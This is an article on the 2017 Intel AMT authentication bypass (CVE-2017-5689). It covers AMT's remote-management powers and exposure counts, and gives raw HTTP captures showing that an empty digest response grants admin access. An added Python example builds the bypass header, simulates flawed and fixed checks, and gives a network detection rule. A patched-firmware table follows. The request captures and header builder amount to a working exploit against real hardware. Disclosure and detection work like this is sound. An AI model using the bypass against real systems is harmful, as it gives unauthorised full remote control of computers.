Vulnerability in Intel AMT was more serious than thought



    On May 1, 2017, Intel reported a critical vulnerability in Active Management Technology (AMT) (INTEL-SA-00075, aka CVE-2017-5689). The vulnerability was found by Maxim Malyutin of Embedi, who kept it secret at Intel's request until the official announcement.

    Intel AMT is a hardware technology that provides remote, out-of-band access (over an independent auxiliary TCP/IP channel) for managing a computer's settings and security, regardless of the machine's power state (it can be switched on and off remotely) and of the state of the OS. The technology is integrated into the chipset. If AMT is used, for instance, as an anti-rootkit that scans RAM and the PC's drives, nothing running inside the OS can bypass that scanning. Worse, remote requests to AMT are not recorded in the operating system's logs, so the OS has no view of what is done through it.

    A Shodan query currently returns more than 8500 systems with AMT ports exposed to the Internet. For some BIOS firmwares, patches fixing the AMT bug have not yet been released.

    AMT lets system administrators remotely perform a wide range of actions on a system: power computers on and off, modify boot code, control input devices, run programs, and so on. In effect, AMT allows you to do remotely everything you could do with physical access to the PC.

    After reading the description of the technology, you can start to imagine what a hacker could do with remote access to a powered-off computer that has AMT. Well, those fantasies are real. Remote access to AMT is provided through a web interface in the browser, protected by HTTP digest authentication. As Maxim found, the digest response is not properly verified: the corresponding field in the Authorization header can simply be left empty, and access is still granted.

    It doesn't even look like a backdoor, because who would implement one in such a clumsy way?

    Vulnerable systems are those released since 2010-2011 (see the list of affected firmware below). This is definitely not an RCE in the memory-corruption sense, but a logic flaw. Maxim Malyutin believes there are several attack vectors through which an attacker could use this vulnerability, perhaps even on Intel systems without AMT support.

    “Authentication is still working,” Malyutin explained. “We just found a way around it.”

    Through a web browser you get full access to the AMT functions, as if you knew the system's admin password. Here is how it is done, captured through a local proxy at 127.0.0.1:16992:

    Request 1 (no credentials):

    GET /index.htm HTTP/1.1
    Host: 127.0.0.1:16992
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Response 1 (digest challenge):

    HTTP/1.1 401 Unauthorized
    WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
    Content-Type: text/html
    Server: AMT
    Content-Length: 678
    Connection: close

    Request 2 (the response field is left empty):

    GET /index.htm HTTP/1.1
    Host: 127.0.0.1:16992
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c"

    Response 2 (access granted):

    HTTP/1.1 200 OK
    Date: Thu, 4 May 2017 16:09:17 GMT
    Server: AMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Cache-Control: no cache
    Expires: Thu, 26 Oct 1995 00:00:00 GMT

    04E6
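    As an added example, not code from the article or from Embedi, here is a small Python model of the exchange above. It parses the digest challenge from the 401, builds the Authorization header with an empty response exactly as in the capture, and feeds it to two server-side checks: a flawed comparison that reproduces the bug and a hardened one. The flawed check is modelled as a prefix comparison bounded by the length of the attacker-supplied response, which is why an empty response passes; that model is an assumption consistent with the empty-response behaviour the article reports, not something the article states. The password, the simulated server and the detection rule for proxy captures are constructed for the example.

```python
"""Added example: model of the INTEL-SA-00075 digest-auth bypass.
Not code from the article or from Embedi. The flawed comparison
below is my model of the bug (assumption), the credentials are
constructed test data, and the server is simulated."""
import hashlib
import hmac
import re

# Constructed: the challenge from the captured 401 above, joined onto one line.
CHALLENGE = ('Digest realm="Digest:048A0000000000000000000000000000", '
             'nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"')

_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_digest_params(header):
    """Parse key=value pairs of a Digest WWW-Authenticate/Authorization header."""
    params = {}
    for m in _PARAM.finditer(header):
        key, quoted, bare = m.groups()
        params[key] = quoted if quoted is not None else bare
    return params


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response = MD5(HA1:nonce:nc:cnonce:qop:HA2), 32 hex digits."""
    ha1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}".encode()).hexdigest()


def vulnerable_verify(expected, supplied):
    """Model of the flawed check (assumption): only len(supplied) characters are
    compared, like strncmp(expected, supplied, strlen(supplied)). An empty
    supplied response compares zero characters and therefore always matches."""
    return expected[:len(supplied)] == supplied


def fixed_verify(expected, supplied):
    """Hardened check: the supplied value must be the full length and is compared
    in constant time."""
    return len(supplied) == len(expected) and hmac.compare_digest(expected, supplied)


def build_authorization(challenge, uri, response, username="admin",
                        nc="00000001", cnonce="60513ab58858482c"):
    """Authorization header in the same layout as the capture above."""
    c = parse_digest_params(challenge)
    return (f'Digest username="{username}", realm="{c["realm"]}", nonce="{c["nonce"]}", '
            f'uri="{uri}", response="{response}", qop=auth, nc={nc}, cnonce="{cnonce}"')


def bypass_authorization(challenge, uri):
    """The bypass from the capture: every field present, response left empty."""
    return build_authorization(challenge, uri, response="")


def server_accepts(verify, password, challenge, authorization, method="GET"):
    """Simulated AMT web server: recompute the digest from the stored password and
    hand both values to the comparison routine under test."""
    c = parse_digest_params(challenge)
    a = parse_digest_params(authorization)
    if a.get("realm") != c["realm"] or a.get("nonce") != c["nonce"]:
        return False
    expected = digest_response(a["username"], c["realm"], password, method, a["uri"],
                               c["nonce"], a["nc"], a["cnonce"], a.get("qop", "auth"))
    return verify(expected, a.get("response", ""))


def is_bypass_attempt(authorization):
    """Detection rule for proxy/IDS captures (constructed): a Digest Authorization
    whose response is not exactly 32 hex digits (empty or truncated) is an
    exploitation attempt, since no legitimate client produces one."""
    resp = parse_digest_params(authorization).get("response", "")
    return re.fullmatch(r"[0-9a-fA-F]{32}", resp) is None


if __name__ == "__main__":
    bypass = bypass_authorization(CHALLENGE, "/index.htm")
    print("flawed check accepts empty response:", server_accepts(vulnerable_verify, "s3cret", CHALLENGE, bypass))
    print("fixed check accepts empty response: ", server_accepts(fixed_verify, "s3cret", CHALLENGE, bypass))
    print("flagged by detection rule:          ", is_bypass_attempt(bypass))
```

    The detection rule is the practical takeaway: since the OS never sees AMT traffic, the only place to catch an attempt like request 2 is on the network (a proxy, an IDS, or a capture on ports 16992/16993), and an Authorization header whose response is shorter than 32 hex characters is a reliable signature for it.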

    A few days after the disclosure, Tenable released a check that exploits this critical AMT privilege-escalation vulnerability. The company suggests using the tool to find vulnerable systems on your own network, so that sysadmins know where new firmware needs to be installed. The check is implemented as a Nessus plugin.

    In those same days the largest server and PC manufacturers published official security advisories for their customers: from HP, from Dell, from Lenovo, from Fujitsu. Detailed information on vulnerable firmware and links to updated versions will appear there as they become available.

    List of patched firmware from Intel

    Vulnerable firmware    CPU generation    Patched firmware
    6.0.xx.xxxx            1st Gen Core      6.2.61.3535
    6.1.xx.xxxx            1st Gen Core      6.2.61.3535
    6.2.xx.xxxx            1st Gen Core      6.2.61.3535
    7.0.xx.xxxx            2nd Gen Core      7.1.91.3272
    7.1.xx.xxxx            2nd Gen Core      7.1.91.3272
    8.0.xx.xxxx            3rd Gen Core      8.1.71.3608
    8.1.xx.xxxx            3rd Gen Core      8.1.71.3608
    9.0.xx.xxxx            4th Gen Core      9.1.41.3024
    9.1.xx.xxxx            4th Gen Core      9.1.41.3024
    9.5.xx.xxxx            4th Gen Core      9.5.61.3012
    10.0.xx.xxxx           5th Gen Core      10.0.55.3000
    11.0.xx.xxxx           6th Gen Core      11.0.25.3001, 11.0.22.3001, 11.0.18.3003
    11.5.xx.xxxx           7th Gen Core      11.6.27.3264
    11.6.xx.xxxx           7th Gen Core      11.6.27.3264, 11.6.12.3202

    Intel has released an official tool for checking a system for the vulnerability under Windows 7/10, along with a guide to using it.
